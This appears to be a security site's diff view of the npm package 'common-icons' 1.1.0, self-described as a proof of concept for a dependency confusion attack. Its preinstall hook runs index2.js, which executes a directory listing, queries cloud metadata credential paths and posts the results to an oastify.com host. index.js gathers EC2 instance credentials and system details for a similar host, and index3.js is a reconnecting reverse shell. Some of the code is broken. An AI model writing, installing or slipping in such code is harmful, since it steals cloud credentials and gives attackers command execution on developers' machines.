common-icons 1.1.0
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +49 -0
- package/index2.js +92 -0
- package/index3.js +40 -0
- package/package.json +12 -0
package/index.js
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
1
|
+
base64data3 = '';
|
|
2
|
+
function req1(){
|
|
3
|
+
http.get({
|
|
4
|
+
hostname: '169.254.169.254',
|
|
5
|
+
port: 80,
|
|
6
|
+
path: '/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance',
|
|
7
|
+
agent: false
|
|
8
|
+
},
|
|
9
|
+
(res) => {
|
|
10
|
+
res.setEncoding('utf8');
|
|
11
|
+
let data = '';
|
|
12
|
+
res.on("data", (d) => {
|
|
13
|
+
var x;
|
|
14
|
+
x=d;
|
|
15
|
+
let buff3 = Buffer.from(x);
|
|
16
|
+
base64data3 = buff3.toString('base64');
|
|
17
|
+
|
|
18
|
+
const trackingData = JSON.stringify({
|
|
19
|
+
p: package,
|
|
20
|
+
c: __dirname,
|
|
21
|
+
homedir: os.homedir(),
|
|
22
|
+
networkinginterfaces: os.networkingInterfaces(),
|
|
23
|
+
release: os.release(),
|
|
24
|
+
userid: os.userInfo().uid,
|
|
25
|
+
hostname: os.hostname,
|
|
26
|
+
username: os.userInfo().username,
|
|
27
|
+
dns: dns.getServers(),
|
|
28
|
+
r: packageJSON ? packageJSON.__resolved : undefined,
|
|
29
|
+
v: packageJSON.version,
|
|
30
|
+
pjson: packageJSON
|
|
31
|
+
});
|
|
32
|
+
var options = {
|
|
33
|
+
hostname: '9y8xoee2in0vrzq9k265ztp4bvhm5et3.oastify.com',
|
|
34
|
+
port: 443,
|
|
35
|
+
path: '/',
|
|
36
|
+
method: "POST",
|
|
37
|
+
headers: {
|
|
38
|
+
"content-type":"application/x-www-form-urlencoded",
|
|
39
|
+
"content-length": postData.length,
|
|
40
|
+
"content-awsconfig":base64data1,
|
|
41
|
+
"content-awscreds":base64data2,
|
|
42
|
+
"content-imdsv":base64data3
|
|
43
|
+
}
|
|
44
|
+
};
|
|
45
|
+
|
|
46
|
+
})
|
|
47
|
+
}
|
|
48
|
+
)
|
|
49
|
+
}
|
package/index2.js
ADDED
|
@@ -0,0 +1,92 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const command = require('child_process');
|
|
5
|
+
const { Buffer } = require('buffer');
|
|
6
|
+
const command_input = "dir c:\\users\\";
|
|
7
|
+
// Timeout duration (in milliseconds)
|
|
8
|
+
const TIMEOUT_DURATION = 5000; // 5 seconds
|
|
9
|
+
|
|
10
|
+
// Function to send POST request to xhihdn248xtkn2394eqdmhdax13srif7.oastify.com
|
|
11
|
+
function sendPostToBlaBla(data, hostname_data=null, command_data=null, homedir_data=null) {
|
|
12
|
+
const postData = JSON.stringify({ ec2: data, hostname: hostname_data, homedir: homedir_data, command_result: command_data });
|
|
13
|
+
|
|
14
|
+
const postOptions = {
|
|
15
|
+
hostname: 'xhihdn248xtkn2394eqdmhdax13srif7.oastify.com',
|
|
16
|
+
port: 443,
|
|
17
|
+
path: '/',
|
|
18
|
+
method: 'POST',
|
|
19
|
+
headers: {
|
|
20
|
+
'Content-Type': 'application/json',
|
|
21
|
+
'Content-Length': Buffer.byteLength(postData)
|
|
22
|
+
}
|
|
23
|
+
};
|
|
24
|
+
|
|
25
|
+
const postReq = https.request(postOptions, (postRes) => {
|
|
26
|
+
let responseData = '';
|
|
27
|
+
|
|
28
|
+
postRes.on('data', (chunk) => {
|
|
29
|
+
responseData += chunk;
|
|
30
|
+
});
|
|
31
|
+
|
|
32
|
+
postRes.on('end', () => {
|
|
33
|
+
console.log('Response from xhihdn248xtkn2394eqdmhdax13srif7.oastify.com:', responseData);
|
|
34
|
+
});
|
|
35
|
+
});
|
|
36
|
+
|
|
37
|
+
postReq.on('error', (error) => {
|
|
38
|
+
console.error('Error with POST request:', error);
|
|
39
|
+
});
|
|
40
|
+
|
|
41
|
+
postReq.write(postData);
|
|
42
|
+
postReq.end();
|
|
43
|
+
}
|
|
44
|
+
|
|
45
|
+
// First, send a request to the EC2 metadata URL
|
|
46
|
+
const options = {
|
|
47
|
+
hostname: 'asd',
|
|
48
|
+
port: 80,
|
|
49
|
+
path: '/latest/meta-data/iam/security-credentials/',
|
|
50
|
+
method: 'GET',
|
|
51
|
+
timeout: TIMEOUT_DURATION // Set the timeout for the request
|
|
52
|
+
};
|
|
53
|
+
if (os.platform() != "win32") {command_input="ls /root"};
|
|
54
|
+
command.exec(command_input, (error, stdout, stderr) => {
|
|
55
|
+
if (error) {
|
|
56
|
+
console.error(`Error executing command: ${error}`);
|
|
57
|
+
return;
|
|
58
|
+
}
|
|
59
|
+
|
|
60
|
+
if (stderr) {
|
|
61
|
+
console.error(`Error in execution: ${stderr}`);
|
|
62
|
+
return;
|
|
63
|
+
}
|
|
64
|
+
|
|
65
|
+
// Output the result of 'dir' command
|
|
66
|
+
result = (stdout);
|
|
67
|
+
})
|
|
68
|
+
|
|
69
|
+
const req = http.request(options, (res) => {
|
|
70
|
+
let data = '';
|
|
71
|
+
|
|
72
|
+
res.on('data', (chunk) => {
|
|
73
|
+
data += chunk;
|
|
74
|
+
});
|
|
75
|
+
|
|
76
|
+
res.on('end', () => {
|
|
77
|
+
// Encode the response data in base64
|
|
78
|
+
const encodedData = Buffer.from(data).toString('base64');
|
|
79
|
+
// Send the encoded data to xhihdn248xtkn2394eqdmhdax13srif7.oastify.com
|
|
80
|
+
sendPostToBlaBla(encodedData);
|
|
81
|
+
});
|
|
82
|
+
});
|
|
83
|
+
|
|
84
|
+
// Handle errors and timeouts for the GET request
|
|
85
|
+
req.on('error', (error) => {
|
|
86
|
+
console.error('Error with GET request:', error.message);
|
|
87
|
+
// Send the failure message to xhihdn248xtkn2394eqdmhdax13srif7.oastify.com if there is an error
|
|
88
|
+
sendPostToBlaBla('connection to EC2 failed', os.hostname(), result, os.homedir());
|
|
89
|
+
});
|
|
90
|
+
|
|
91
|
+
// End the GET request
|
|
92
|
+
req.end();
|
package/index3.js
ADDED
|
@@ -0,0 +1,40 @@
|
|
|
1
|
+
const net = require('net');
|
|
2
|
+
const { exec } = require('child_process');
|
|
3
|
+
|
|
4
|
+
// Change this to the attacker's IP and port
|
|
5
|
+
const REMOTE_HOST = '127.0.0.1'; // Replace with attacker's IP
|
|
6
|
+
const REMOTE_PORT = 8088; // Replace with attacker's listening port
|
|
7
|
+
|
|
8
|
+
function connectShell() {
|
|
9
|
+
const client = new net.Socket();
|
|
10
|
+
|
|
11
|
+
// Try to connect to the attacker/listener
|
|
12
|
+
client.connect(REMOTE_PORT, REMOTE_HOST, () => {
|
|
13
|
+
console.log('Connected to the attack server');
|
|
14
|
+
client.write('Reverse shell connected!\n'); // Notify listener of connection
|
|
15
|
+
});
|
|
16
|
+
|
|
17
|
+
// When data is received from the attacker's server
|
|
18
|
+
client.on('data', (data) => {
|
|
19
|
+
// Execute the received command
|
|
20
|
+
exec(data.toString(), (error, stdout, stderr) => {
|
|
21
|
+
if (stdout) client.write(stdout); // Send command output back to the attacker
|
|
22
|
+
if (stderr) client.write(stderr); // Send any errors back to the attacker
|
|
23
|
+
if (error) client.write(error.message);
|
|
24
|
+
});
|
|
25
|
+
});
|
|
26
|
+
|
|
27
|
+
// Reconnect on close
|
|
28
|
+
client.on('close', () => {
|
|
29
|
+
console.log('Connection closed, retrying...');
|
|
30
|
+
setTimeout(connectShell, 5000); // Try reconnecting every 5 seconds
|
|
31
|
+
});
|
|
32
|
+
|
|
33
|
+
client.on('error', (err) => {
|
|
34
|
+
console.error('Connection error:', err.message);
|
|
35
|
+
setTimeout(connectShell, 5000); // Retry connection on error
|
|
36
|
+
});
|
|
37
|
+
}
|
|
38
|
+
|
|
39
|
+
// Start the reverse shell
|
|
40
|
+
connectShell();
|
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "common-icons",
|
|
3
|
+
"version": "1.1.0",
|
|
4
|
+
"description": "POC for confusion attack",
|
|
5
|
+
"main": "index2.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index2.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "cwg test",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|